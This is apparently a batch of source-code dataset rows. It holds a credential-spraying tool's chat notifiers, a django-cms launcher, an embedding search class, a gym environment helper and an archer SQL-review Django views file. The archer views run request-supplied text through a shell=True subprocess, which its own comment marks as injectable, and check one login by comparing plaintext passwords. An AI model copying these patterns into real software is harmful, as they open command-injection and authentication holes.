] | null | null | null | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | import pymsteams
from discord_webhook import DiscordWebhook
from notifiers import get_notifier
def slack(webhook, host):
    """Post a Slack notification that credentials were guessed for *host*.

    Args:
        webhook: Slack incoming-webhook URL.
        host: host for which a spray attempt succeeded.
    """
    # Renamed the local from 'slack', which shadowed this function's own name.
    notifier = get_notifier("slack")
    notifier.notify(message=f"Credentials guessed for host: {host}", webhook_url=webhook)
def teams(webhook, host):
    """Post a Microsoft Teams notification that credentials were guessed for *host*.

    Args:
        webhook: Teams connector-card webhook URL.
        host: host for which a spray attempt succeeded.
    """
    notify = pymsteams.connectorcard(webhook)
    notify.text(f"Credentials guessed for host: {host}")
    notify.send()
def discord(webhook, host):
    """Post a Discord notification that credentials were guessed for *host*.

    Args:
        webhook: Discord webhook URL.
        host: host for which a spray attempt succeeded.
    """
    notify = DiscordWebhook(
        url=webhook, content=f"Credentials guessed for host: {host}"
    )
    # Bug fix: execute() must be called on the DiscordWebhook instance,
    # not on the 'webhook' URL string (which has no execute attribute).
    response = notify.execute()
| 25.454545 | 86 | 0.725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 124 | 0.221429 |
17ef674eddb0b6d4127cc6eda09e667c21a0faed | 716 | py | Python | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | 2 | 2018-05-17T02:49:49.000Z | 2019-08-20T02:07:44.000Z | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | 2 | 2019-02-13T07:58:23.000Z | 2019-02-13T07:58:27.000Z | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
import sys
from cms.test_utils.cli import configure
from cms.test_utils.tmpdir import temp_dir
import os
def main():
    """Run Django management commands against a throwaway CMS test project.

    Static and media roots live in temporary directories that are cleaned
    up when the command finishes; the database is a local SQLite file.
    """
    with temp_dir() as STATIC_ROOT:
        with temp_dir() as MEDIA_ROOT:
            configure(
                'sqlite://localhost/cmstestdb.sqlite',
                ROOT_URLCONF='cms.test_utils.project.urls',
                STATIC_ROOT=STATIC_ROOT,
                MEDIA_ROOT=MEDIA_ROOT,
            )
            # Imported after configure() so Django settings are ready.
            from django.core.management import execute_from_command_line
            os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cms.test_utils.cli")
            execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()  # script entry point
| 27.538462 | 81 | 0.632682 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 164 | 0.22905 |
17f2ae7ec4594fe359f3c7b237e6c438d1daf8c2 | 2,639 | py | Python | semantic-clustering/semantic_clustering/EmbeddingDataFrameWrapper.py | zzoia/sbert_wk_sentence_embedder | 096b149eefec25fac83aaef674421dfdfb150a68 | [
"MIT"
] | null | null | null | semantic-clustering/semantic_clustering/EmbeddingDataFrameWrapper.py | zzoia/sbert_wk_sentence_embedder | 096b149eefec25fac83aaef674421dfdfb150a68 | [
"MIT"
] | null | null | null | semantic-clustering/semantic_clustering/EmbeddingDataFrameWrapper.py | zzoia/sbert_wk_sentence_embedder | 096b149eefec25fac83aaef674421dfdfb150a68 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from sklearn.metrics.pairwise import cosine_similarity
class EmbeddingDataFrameWrapper:
    """Cosine-similarity search over a pickled DataFrame of texts and embeddings.

    The frame must contain ``text_column`` plus either an embedding column named
    by ``pooling`` or rows a callable ``pooling`` can turn into a vector.
    """

    def __init__(self, path_to_csv, embedder=None, text_column="text", pooling="embedding", print_results=True):
        # NOTE(review): despite the parameter name, the file is loaded with
        # read_pickle, not read_csv — confirm callers pass a pickle path.
        self.embed_df = pd.read_pickle(path_to_csv)
        self.embedder = embedder  # callable mapping a query string to a vector
        self.text_column = text_column
        self.pooling = pooling  # column name, or callable applied per row
        self.print_results = print_results

    def search(self, query, top_n=None, threshold=None):
        """Return (indices, texts, cosines) of rows most similar to *query*.

        *query* may be a string (embedded via ``embedder``), an int row index
        (its stored embedding is used), or a raw embedding vector.
        """
        if isinstance(query, str):
            query_embedding = self.embedder(query)
        elif isinstance(query, int):
            query_embedding = self.__get_embedding_by_index(query)
        else:
            query_embedding = query
        index, text, cosine = self.__get_top_similar(query_embedding, top_n, threshold)
        if self.print_results:
            self.__print_similar(zip(index, text, cosine))
        return index, text, cosine

    def get_random_sample(self):
        # Returns an (index, text) pair for one random row.
        rnd = self.embed_df.sample(1)
        return (rnd.index[0], rnd[self.text_column].values[0])

    def get_text_by_index(self, index):
        # Raises IndexError if the index is absent from the frame.
        return self.embed_df[self.embed_df.index == index][self.text_column].values[0]

    def __get_embedding_by_index(self, index):
        # Resolve a single row's embedding according to the pooling strategy.
        df = self.embed_df[self.embed_df.index == index]
        if isinstance(self.pooling, str):
            series = df[self.pooling]
        elif callable(self.pooling):
            series = df.apply(self.pooling, axis=1)
        else:
            raise Exception("No pooling strategy provided")
        return series.values[0]

    def __pool(self):
        # Materialize every row's embedding as a plain list of vectors.
        if isinstance(self.pooling, str):
            series = self.embed_df[self.pooling]
        elif callable(self.pooling):
            series = self.embed_df.apply(self.pooling, axis=1)
        else:
            raise Exception("No pooling strategy provided")
        return series.values.tolist()

    def __get_top_similar(self, query, top_n, threshold):
        # Rank all rows by cosine similarity to the query, most similar first.
        similarity = cosine_similarity([query], self.__pool())
        similarity = np.squeeze(similarity)
        indices = np.argsort(similarity)[::-1]
        if threshold:
            # Keep only rows strictly above the threshold.
            indices = indices[:np.sum(similarity > threshold)]
        if top_n:
            # Keeps top_n+1 entries — presumably so the query row itself can
            # appear alongside top_n true matches when searching by index;
            # TODO confirm this off-by-one is intentional.
            indices = indices[:top_n+1]
        texts = self.embed_df.iloc[indices][self.text_column].values
        return self.embed_df.iloc[indices].index.values, texts, similarity[indices]

    def __print_similar(self, similar):
        # Pretty-print (index, text, cosine) triples, e.g. "[#12 (0.87)] - text".
        for index, result, cosine in similar:
            str_format = "[{:<7} ({:.2f})] - {}"
            print(str_format.format(f"#{index}", cosine, result))
17f3838494cef3ff36c0edabf5b3161b2c576936 | 1,716 | py | Python | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | 4 | 2020-06-02T16:25:31.000Z | 2020-07-28T12:26:26.000Z | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | 1 | 2020-09-30T10:24:04.000Z | 2020-09-30T10:24:04.000Z | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | null | null | null | import gym
import numpy as np
# wrapper classes are anti-patterns.
def FlatGoalEnv(env, obs_keys, goal_keys):
    """
    We require the keys to be passed in explicitly, to avoid mistakes.

    Flattens the selected entries of a Dict observation space into one Box by
    monkey-patching ``env.step``/``env.reset`` in place; the SAME env object
    is returned (no wrapper class, per the note above).

    :param env: a gym.Env whose observation_space is a gym.spaces.Dict
    :param obs_keys: obs_keys=('state_observation',)
    :param goal_keys: goal_keys=('desired_goal',)
    """
    goal_keys = goal_keys or []
    for k in obs_keys:
        assert k in env.observation_space.spaces
    for k in goal_keys:
        assert k in env.observation_space.spaces
    assert isinstance(env.observation_space, gym.spaces.Dict)
    # Capture the originals before patching so the closures below can delegate.
    _observation_space = env.observation_space
    _step = env.step
    _reset = env.reset
    # TODO: handle nested dict
    # Keep the original Dict space reachable; publish a flat Box whose bounds
    # are the concatenated bounds of the selected sub-spaces.
    env._observation_space = _observation_space
    env.observation_space = gym.spaces.Box(
        np.hstack([_observation_space.spaces[k].low for k in obs_keys]),
        np.hstack([_observation_space.spaces[k].high for k in obs_keys]),
    )
    if len(goal_keys) > 0:
        env.goal_space = gym.spaces.Box(
            np.hstack([_observation_space.spaces[k].low for k in goal_keys]),
            np.hstack([_observation_space.spaces[k].high for k in goal_keys]),
        )
    # _goal = None
    def step(action):
        # Delegate, then flatten the dict observation into one vector.
        nonlocal obs_keys
        obs, reward, done, info = _step(action)
        flat_obs = np.hstack([obs[k] for k in obs_keys])
        return flat_obs, reward, done, info
    def reset():
        nonlocal goal_keys
        obs = _reset()
        # if len(goal_keys) > 0:
        #     _goal = np.hstack([obs[k] for k in goal_keys])
        return np.hstack([obs[k] for k in obs_keys])
    # def get_goal(self):
    #     return _goal
    env.step = step
    env.reset = reset
    return env
| 27.238095 | 78 | 0.634033 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 393 | 0.229021 |
17f39ca5f51dfeded3449260d86659beaadb7c0a | 23,967 | py | Python | sql/views_ajax.py | Galo1117/archer | a0e32b8990cdbbe4a7166656762fbf0f694092fa | [
"Apache-2.0"
] | null | null | null | sql/views_ajax.py | Galo1117/archer | a0e32b8990cdbbe4a7166656762fbf0f694092fa | [
"Apache-2.0"
] | null | null | null | sql/views_ajax.py | Galo1117/archer | a0e32b8990cdbbe4a7166656762fbf0f694092fa | [
"Apache-2.0"
] | null | null | null | # -*- coding: UTF-8 -*-
import re
import simplejson as json
import datetime
import multiprocessing
import urllib.parse
import subprocess
from django.contrib.auth import authenticate, login
from django.db.models import Q
from django.db import transaction
from django.conf import settings
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.contrib.auth.hashers import check_password, make_password
from sql.permission import superuser_required
if settings.ENABLE_LDAP:
from django_auth_ldap.backend import LDAPBackend
from django.core import serializers
from .dao import Dao
from .const import Const, WorkflowDict
from .inception import InceptionDao
from .projectresource import PermissionVerification
from .aes_decryptor import Prpcrypt
from .models import users, master_config, workflow, Group
from sql.sendmail import MailSender
import logging
from .workflow import Workflow
from .extend_json_encoder import ExtendJSONEncoder
logger = logging.getLogger('default')
mailSender = MailSender()
dao = Dao()
inceptionDao = InceptionDao()
prpCryptor = Prpcrypt()
login_failure_counter = {}  # failed-login lockout counter used by loginAuthenticate
sqlSHA1_cache = {}  # {workflow_id: {sql_text_row_id: sqlSHA1}} — caches SQL/SHA1 pairs to cut DB round-trips
workflowOb = Workflow()
# 登录失败通知
def log_mail_record(login_failed_message):
    """Log a failed-login warning and, when mail is enabled, notify the security address."""
    logger.warning(login_failed_message)
    if getattr(settings, 'MAIL_ON_OFF'):
        mailSender.sendEmail('login inception', login_failed_message,
                             getattr(settings, 'MAIL_REVIEW_SECURE_ADDR'))
# ajax接口,登录页面调用,用来验证用户名密码
@csrf_exempt
def loginAuthenticate(username, password):
    """Authenticate a username/password pair with a lockout counter.

    An account that fails LOCK_CNT_THRESHOLD times within LOCK_TIME_THRESHOLD
    seconds (both from settings; 5 times / 5 minutes) stays locked until the
    window expires.

    Returns a dict: status 0 = ok (data holds the user), 1 = bad credentials,
    2 = empty input, 3 = account locked.
    """
    lock_cnt = settings.LOCK_CNT_THRESHOLD
    lock_window = settings.LOCK_TIME_THRESHOLD

    # Reject empty credentials up front (covers None from request.POST.get()).
    if username == "" or password == "" or username is None or password is None:
        return {'status': 2, 'msg': '登录用户名或密码为空,请重新输入!', 'data': ''}

    record = login_failure_counter.get(username)
    if (record is not None and record["cnt"] >= lock_cnt
            and (datetime.datetime.now() - record["last_failure_time"]).seconds <= lock_window):
        log_mail_record('user:{},login failed, account locking...'.format(username))
        return {'status': 3, 'msg': '登录失败超过5次,该账号已被锁定5分钟!', 'data': ''}

    user = authenticate(username=username, password=password)
    if user:
        # A successful login clears any accumulated failures.
        if username in login_failure_counter:
            login_failure_counter.pop(username)
        return {'status': 0, 'msg': 'ok', 'data': user}

    # Failed login: start the counter, advance it within the window, or
    # restart it once the window has passed (auto-unlock after 5 minutes).
    if record is None:
        login_failure_counter[username] = {"cnt": 1, "last_failure_time": datetime.datetime.now()}
    else:
        if (datetime.datetime.now() - record["last_failure_time"]).seconds <= lock_window:
            record["cnt"] += 1
        else:
            record["cnt"] = 1
        record["last_failure_time"] = datetime.datetime.now()
    log_mail_record(
        'user:{},login failed, fail count:{}'.format(username, login_failure_counter[username]["cnt"]))
    return {'status': 1, 'msg': '用户名或密码错误,请重新输入!', 'data': ''}
# ajax接口,登录页面调用,用来验证用户名密码
@csrf_exempt
def authenticateEntry(request):
    """HTTP entry point for the login form; delegates checking to loginAuthenticate()."""
    username = request.POST.get('username')
    password = request.POST.get('password')
    result = loginAuthenticate(username, password)
    if result['status'] == 0:
        user = result.get('data')
        # With LDAP enabled, mirror the (LDAP-verified) password into the local row.
        if settings.ENABLE_LDAP:
            try:
                users.objects.get(username=username)
            except Exception:
                # NOTE(review): creates a user row with only the password set —
                # no username/email is assigned here; verify this is intentional.
                insert_info = users()
                insert_info.password = make_password(password)
                insert_info.save()
            else:
                replace_info = users.objects.get(username=username)
                replace_info.password = make_password(password)
                replace_info.save()
            # Re-authenticate via Django's built-in login so the admin site
            # does not require a second login.
            user = authenticate(username=username, password=password)
        if user:
            login(request, user)
            # Keep the username in the session for the rest of the app.
            request.session['login_username'] = username
        result = {'status': 0, 'msg': 'ok', 'data': None}
    return HttpResponse(json.dumps(result), content_type='application/json')
#ITOM用户认证接口,用来验证用户名密码
@csrf_exempt
def authenticateEntryITOM(request):
    """ITOM single-sign-on entry: checks the referer host plus username/password from the query string."""
    # if request.META.has_key('HTTP_X_FORWARDED_FOR'):
    #     ip = request.META['HTTP_X_FORWARDED_FOR']
    # else:
    #     ip = request.META['REMOTE_ADDR']
    try:
        # The "trusted caller" check is based on the Referer header's host.
        ip = urllib.parse.urlparse(request.META.get("HTTP_REFERER", None)).netloc
        # ip = re.findall(r'\d+.\d+.\d+.\d+', request.META.get("HTTP_REFERER",None))
    except Exception as e:
        ip = "NULL"
    result = {'status': 4, 'msg': u'IP鉴权失败,非信任IP!', 'data': ''}
    strUsername = request.GET.get('username')
    strPassword = request.GET.get('password')
    sessionExpiry = settings.SESSION_EXPIRY
    if strUsername == "" or strPassword == "" or strUsername is None or strPassword is None:
        result = {'status':2, 'msg':u'登录用户名或密码为空,请重新输入!', 'data':''}
    elif settings.ITOM_HOST not in ip:
        result = {'status': 4, 'msg': u'IP鉴权失败,非信任IP!', 'data': ''}
    else:
        correct_users = users.objects.filter(username=strUsername)
        # SECURITY NOTE(review): this compares the submitted password directly
        # against the stored password field (plaintext comparison, not a hash
        # check) — confirm the ITOM integration really stores/transmits it this way.
        if len(correct_users) == 1 and correct_users[0].is_active and strPassword == correct_users[0].password:
            result = {'status':0, 'msg':'ok', 'data':''}
        else:
            result = {'status':1, 'msg':u'用户名或密码错误,请重新输入!', 'data':''}
    if result['status'] == 0:
        request.session['login_username'] = strUsername
        request.session.set_expiry(sessionExpiry)
        return HttpResponseRedirect('/sqlquery/')
    else:
        return HttpResponse(result['msg'])
    # NOTE(review): unreachable — both branches above return.
    return HttpResponse(json.dumps(result), content_type='application/json')
# 获取审核列表
@csrf_exempt
def sqlworkflow(request):
    """Paginated JSON listing of SQL workflows, filtered by status tab and search text."""
    # Current user from the session.
    loginUser = request.session.get('login_username', False)
    limit = int(request.POST.get('limit'))
    offset = int(request.POST.get('offset'))
    # The ORM slice below needs an absolute end index, not a page size.
    limit = offset + limit
    # Search parameter (matches engineer or workflow name).
    search = request.POST.get('search')
    if search is None:
        search = ''
    # Status-tab filter.
    navStatus = request.POST.get('navStatus')
    # Admins/DBAs see every workflow; everyone else only sees workflows they
    # submitted or are reviewing.
    loginUserOb = users.objects.get(username=loginUser)
    # "all" tab: every status, search applied.
    if navStatus == 'all':
        if loginUserOb.is_superuser == 1 or loginUserOb.role == "DBA":
            listWorkflow = workflow.objects.filter(
                Q(engineer__contains=search) | Q(workflow_name__contains=search)
            ).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer", "status",
                                                            "is_backup", "create_time", "cluster_name", "db_name",
                                                            "group_name")
            listWorkflowCount = workflow.objects.filter(
                Q(engineer__contains=search) | Q(workflow_name__contains=search)).count()
        else:
            listWorkflow = workflow.objects.filter(
                Q(engineer=loginUser) | Q(review_man__contains=loginUser)
            ).filter(
                Q(engineer__contains=search) | Q(workflow_name__contains=search)
            ).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer", "status",
                                                            "is_backup", "create_time", "cluster_name", "db_name",
                                                            "group_name")
            listWorkflowCount = workflow.objects.filter(
                Q(engineer=loginUser) | Q(review_man__contains=loginUser)).filter(
                Q(engineer__contains=search) | Q(workflow_name__contains=search)
            ).count()
    elif navStatus in Const.workflowStatus.keys():
        # Single-status tab: same visibility rules, no text search.
        if loginUserOb.is_superuser == 1 or loginUserOb.role == "DBA":
            listWorkflow = workflow.objects.filter(
                status=Const.workflowStatus[navStatus]
            ).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer", "status",
                                                            "is_backup", "create_time", "cluster_name", "db_name",
                                                            "group_name")
            listWorkflowCount = workflow.objects.filter(status=Const.workflowStatus[navStatus]).count()
        else:
            listWorkflow = workflow.objects.filter(
                status=Const.workflowStatus[navStatus]
            ).filter(
                Q(engineer=loginUser) | Q(review_man__contains=loginUser)
            ).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer", "status",
                                                            "is_backup", "create_time", "cluster_name", "db_name",
                                                            "group_name")
            listWorkflowCount = workflow.objects.filter(
                status=Const.workflowStatus[navStatus]
            ).filter(
                Q(engineer=loginUser) | Q(review_man__contains=loginUser)).count()
    else:
        context = {'errMsg': '传入的navStatus参数有误!'}
        return render(request, 'error.html', context)
    # Serialize the QuerySet into plain rows for the bootstrap-table client.
    rows = [row for row in listWorkflow]
    result = {"total": listWorkflowCount, "rows": rows}
    # Return the query result.
    return HttpResponse(json.dumps(result, cls=ExtendJSONEncoder, bigint_as_string=True), content_type='application/json')
# 提交SQL给inception进行自动审核
@csrf_exempt
def simplecheck(request):
    """Run the submitted SQL through Inception's automatic review and return the verdict as JSON.

    Response ``data`` carries the per-statement review rows plus warning/error counters.
    """
    sqlContent = request.POST.get('sql_content')
    clusterName = request.POST.get('cluster_name')
    db_name = request.POST.get('db_name')
    finalResult = {'status': 0, 'msg': 'ok', 'data': {}}
    # Server-side parameter validation.
    if sqlContent is None or clusterName is None or db_name is None:
        finalResult['status'] = 1
        finalResult['msg'] = '页面提交参数可能为空'
        return HttpResponse(json.dumps(finalResult), content_type='application/json')
    # Strip comment-only statements ("-- ..." lines and "/* ... */;" blocks).
    sqlContent = ''.join(
        map(lambda x: re.compile(r'(^--.*|^/\*.*\*/;[\f\n\r\t\v\s]*$)').sub('', x, count=1),
            sqlContent.splitlines(1))).strip()
    # Collapse runs of blank lines.
    sqlContent = re.sub('[\r\n\f]{2,}', '\n', sqlContent)
    # BUGFIX: the original indexed sqlContent[-1], which raised IndexError when
    # the submission consisted only of comments/whitespace; endswith() is safe on ''.
    if not sqlContent.endswith(";"):
        finalResult['status'] = 1
        finalResult['msg'] = 'SQL语句结尾没有以;结尾,请重新修改并提交!'
        return HttpResponse(json.dumps(finalResult), content_type='application/json')
    # Current user from the session.
    loginUser = request.session.get('login_username', False)
    loginUserOb = users.objects.get(username=loginUser)
    # Hand the SQL to Inception via the permission layer for automatic review.
    pv = PermissionVerification(loginUser, loginUserOb)
    # Superusers skip the per-resource privilege restriction (last arg = 1).
    if loginUserOb.is_superuser:
        reviewResult = pv.check_resource_priv(sqlContent, clusterName, db_name, 1)
    else:
        reviewResult = pv.check_resource_priv(sqlContent, clusterName, db_name, 0)
    result = reviewResult["data"]
    if reviewResult["status"] == 1:
        finalResult['status'] = 1
        finalResult['msg'] = reviewResult["msg"]
        return HttpResponse(json.dumps(finalResult), content_type='application/json')
    if result is None or len(result) == 0:
        finalResult['status'] = 1
        finalResult['msg'] = 'inception返回的结果集为空!可能是SQL语句有语法错误'
        return HttpResponse(json.dumps(finalResult), content_type='application/json')
    # Convert Inception's positional result rows into dicts so the detail page
    # can render them (and so they can be stored as JSON later).
    column_list = ['ID', 'stage', 'errlevel', 'stagestatus', 'errormessage', 'SQL', 'Affected_rows', 'sequence',
                   'backup_dbname', 'execute_time', 'sqlsha1']
    rows = []
    CheckWarningCount = 0
    CheckErrorCount = 0
    for row_item in result:
        row = {}
        # errlevel: 0 = ok, 1 = warning, 2 = error.
        row['errlevel'] = row_item[2]
        row['errormessage'] = row_item[4]
        if row['errlevel'] == 1:
            CheckWarningCount = CheckWarningCount + 1
        elif row['errlevel'] == 2:
            CheckErrorCount = CheckErrorCount + 1
        row['ID'] = row_item[0]
        row['stage'] = row_item[1]
        row['stagestatus'] = row_item[3]
        row['SQL'] = row_item[5]
        row['Affected_rows'] = row_item[6]
        row['sequence'] = row_item[7]
        row['backup_dbname'] = row_item[8]
        row['execute_time'] = row_item[9]
        # row['sqlsha1'] = row_item[10]
        rows.append(row)
    finalResult['data']['rows'] = rows
    finalResult['data']['column_list'] = column_list
    finalResult['data']['CheckWarningCount'] = CheckWarningCount
    finalResult['data']['CheckErrorCount'] = CheckErrorCount
    return HttpResponse(json.dumps(finalResult), content_type='application/json')
# 请求图表数据
@csrf_exempt
def getMonthCharts(request):
    """Return the per-month workflow statistics used by the dashboard chart."""
    chart_data = dao.getWorkChartsByMonth()
    return HttpResponse(json.dumps(chart_data), content_type='application/json')
@csrf_exempt
def getPersonCharts(request):
    """Return the per-person workflow statistics used by the dashboard chart."""
    chart_data = dao.getWorkChartsByPerson()
    return HttpResponse(json.dumps(chart_data), content_type='application/json')
def getSqlSHA1(workflowId):
    """Extract per-statement sqlSHA1 values from a workflow's stored review_content.

    Returns a dict mapping 1-based statement id -> sqlSHA1, including only
    statements that have one. A non-empty result means the workflow runs
    through pt-OSC; it is cached in sqlSHA1_cache (without expiry, since such
    workflows are the minority and the values never change).
    """
    workflowDetail = get_object_or_404(workflow, pk=workflowId)
    dictSHA1 = {}
    # review_content is stored as a JSON string; column index 10 holds sqlSHA1.
    listReCheckResult = json.loads(workflowDetail.review_content)
    # Idiom fix: enumerate() replaces the original range(len(...)) index loop.
    for id, row in enumerate(listReCheckResult, start=1):
        sqlSHA1 = row[10]
        if sqlSHA1 != '':
            dictSHA1[id] = sqlSHA1
    if dictSHA1:
        sqlSHA1_cache[workflowId] = dictSHA1
    return dictSHA1
@csrf_exempt
def getOscPercent(request):
    """Return the pt-OSC execution progress and remaining time for one SQL row."""
    workflowId = request.POST['workflowid']
    sqlID = request.POST['sqlID']
    if workflowId == '' or workflowId is None or sqlID == '' or sqlID is None:
        context = {"status": -1, 'msg': 'workflowId或sqlID参数为空.', "data": ""}
        return HttpResponse(json.dumps(context), content_type='application/json')
    workflowId = int(workflowId)
    sqlID = int(sqlID)
    dictSHA1 = {}
    # Prefer the module-level cache; fall back to parsing review_content.
    if workflowId in sqlSHA1_cache:
        dictSHA1 = sqlSHA1_cache[workflowId]
        # cachehit = "hit"
    else:
        dictSHA1 = getSqlSHA1(workflowId)
    if dictSHA1 != {} and sqlID in dictSHA1:
        sqlSHA1 = dictSHA1[sqlID]
        try:
            # SHA1 resolved — ask Inception for the live progress.
            result = inceptionDao.getOscPercent(sqlSHA1)
        except Exception as msg:
            result = {'status': 1, 'msg': msg, 'data': ''}
            return HttpResponse(json.dumps(result), content_type='application/json')
        if result["status"] == 0:
            # Progress value obtained.
            pctResult = result
        else:
            # status == 1: no live progress. Compare against the stored
            # execute_result to decide "already done" vs. "not started yet".
            execute_result = workflow.objects.get(id=workflowId).execute_result
            try:
                listExecResult = json.loads(execute_result)
            except ValueError:
                listExecResult = execute_result
            # NOTE(review): if execute_result is not a list (or too short),
            # pctResult is never assigned and the final line raises
            # UnboundLocalError — confirm that path cannot occur in practice.
            if type(listExecResult) == list and len(listExecResult) >= sqlID - 1:
                if dictSHA1[sqlID] in listExecResult[sqlID - 1][10]:
                    # Already executed: report 100%.
                    pctResult = {"status": 0, "msg": "ok", "data": {"percent": 100, "timeRemained": ""}}
                else:
                    # Either a preceding DML is still running or this row has
                    # not started yet; the front end is expected to retry.
                    pctResult = {"status": -3, "msg": "进度未知", "data": {"percent": -100, "timeRemained": ""}}
    elif dictSHA1 != {} and sqlID not in dictSHA1:
        pctResult = {"status": 4, "msg": "该行SQL不是由pt-OSC执行的", "data": ""}
    else:
        pctResult = {"status": -2, "msg": "整个工单不由pt-OSC执行", "data": ""}
    return HttpResponse(json.dumps(pctResult), content_type='application/json')
@csrf_exempt
def getWorkflowStatus(request):
    """Return the current status field of a single workflow as JSON."""
    workflowId = request.POST['workflowid']
    if workflowId == '' or workflowId is None:
        error = {"status": -1, 'msg': 'workflowId参数为空.', "data": ""}
        return HttpResponse(json.dumps(error), content_type='application/json')
    workflowDetail = get_object_or_404(workflow, pk=int(workflowId))
    payload = {"status": workflowDetail.status, "msg": "", "data": ""}
    return HttpResponse(json.dumps(payload), content_type='application/json')
@csrf_exempt
def stopOscProgress(request):
    """Abort the pt-OSC process behind one SQL row of an executing workflow."""
    workflowId = request.POST['workflowid']
    sqlID = request.POST['sqlID']
    if workflowId == '' or workflowId is None or sqlID == '' or sqlID is None:
        context = {"status": -1, 'msg': 'workflowId或sqlID参数为空.', "data": ""}
        return HttpResponse(json.dumps(context), content_type='application/json')
    loginUser = request.session.get('login_username', False)
    workflowDetail = workflow.objects.get(id=workflowId)
    try:
        reviewMan = json.loads(workflowDetail.review_man)
    except ValueError:
        # Legacy rows store a single reviewer name instead of a JSON list.
        reviewMan = (workflowDetail.review_man,)
    # Server-side double check: the workflow must be executing and the caller
    # must be one of its reviewers, so forged or replayed requests are rejected.
    if workflowDetail.status != Const.workflowStatus['executing']:
        context = {"status": -1, "msg": '当前工单状态不是"执行中",请刷新当前页面!', "data": ""}
        return HttpResponse(json.dumps(context), content_type='application/json')
    if loginUser is None or loginUser not in reviewMan:
        context = {"status": -1, 'msg': '当前登录用户不是审核人,请重新登录.', "data": ""}
        return HttpResponse(json.dumps(context), content_type='application/json')
    workflowId = int(workflowId)
    sqlID = int(sqlID)
    # Resolve the row's sqlSHA1 (cache first), then ask Inception to stop it.
    if workflowId in sqlSHA1_cache:
        dictSHA1 = sqlSHA1_cache[workflowId]
    else:
        dictSHA1 = getSqlSHA1(workflowId)
    if dictSHA1 != {} and sqlID in dictSHA1:
        sqlSHA1 = dictSHA1[sqlID]
        try:
            optResult = inceptionDao.stopOscProgress(sqlSHA1)
        except Exception as msg:
            result = {'status': 1, 'msg': msg, 'data': ''}
            return HttpResponse(json.dumps(result), content_type='application/json')
    else:
        optResult = {"status": 4, "msg": "不是由pt-OSC执行的", "data": ""}
    return HttpResponse(json.dumps(optResult), content_type='application/json')
# 获取SQLAdvisor的优化结果
@csrf_exempt
def sqladvisorcheck(request):
    """Run the submitted SQL through the SQLAdvisor binary and return its advice as JSON."""
    sqlContent = request.POST.get('sql_content')
    clusterName = request.POST.get('cluster_name')
    dbName = request.POST.get('db_name')
    verbose = request.POST.get('verbose')
    finalResult = {'status': 0, 'msg': 'ok', 'data': []}
    # Server-side parameter validation.
    if sqlContent is None or clusterName is None:
        finalResult['status'] = 1
        finalResult['msg'] = '页面提交参数可能为空'
        return HttpResponse(json.dumps(finalResult), content_type='application/json')
    sqlContent = sqlContent.strip()
    # BUGFIX: the original indexed sqlContent[-1], which raised IndexError on a
    # whitespace-only submission; endswith() handles the empty string safely.
    if not sqlContent.endswith(";"):
        finalResult['status'] = 1
        finalResult['msg'] = 'SQL语句结尾没有以;结尾,请重新修改并提交!'
        return HttpResponse(json.dumps(finalResult), content_type='application/json')
    if verbose is None or verbose == '':
        verbose = 1
    # Connection details for the cluster's master.
    cluster_info = master_config.objects.get(cluster_name=clusterName)
    # Invoke the external SQLAdvisor binary with the decrypted credentials.
    sqladvisor_path = getattr(settings, 'SQLADVISOR')
    sqlContent = sqlContent.strip().replace('"', '\\"').replace('`', '\`').replace('\n', ' ')
    try:
        # SECURITY NOTE(review): the command line is assembled by string
        # interpolation and executed with shell=True; dbName and sqlContent come
        # straight from the request, so this is shell-injectable despite the
        # quote escaping above. Prefer an argument list with shell=False —
        # left unchanged here to avoid altering SQLAdvisor invocation semantics.
        p = subprocess.Popen(sqladvisor_path + ' -h "%s" -P "%s" -u "%s" -p "%s\" -d "%s" -v %s -q "%s"' % (
            str(cluster_info.master_host), str(cluster_info.master_port), str(cluster_info.master_user),
            str(prpCryptor.decrypt(cluster_info.master_password), ), str(dbName), verbose, sqlContent),
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, universal_newlines=True)
        stdout, stderr = p.communicate()
        finalResult['data'] = stdout
    except Exception:
        finalResult['data'] = 'sqladvisor运行报错,请联系管理员'
    return HttpResponse(json.dumps(finalResult), content_type='application/json')
# 获取审核列表
@csrf_exempt
def workflowlist(request):
    """Return the current user's audit list (paginated, optionally filtered) as JSON."""
    session_user = request.session.get('login_username', False)
    login_user_obj = users.objects.get(username=session_user)
    page_size = int(request.POST.get('limit'))
    offset = int(request.POST.get('offset'))
    workflow_type = int(request.POST.get('workflow_type'))
    search = request.POST.get('search') or ''
    # The workflow API expects an absolute end index, not a page size.
    audit = workflowOb.auditlist(login_user_obj, workflow_type, offset, offset + page_size, search)
    payload = {
        "total": audit['data']['auditlistCount'],
        # Serialize the QuerySet into a plain list for JSON encoding.
        "rows": list(audit['data']['auditlist']),
    }
    return HttpResponse(json.dumps(payload, cls=ExtendJSONEncoder, bigint_as_string=True),
                        content_type='application/json')
# 添加项目组
@csrf_exempt
@superuser_required
def addgroup(request):
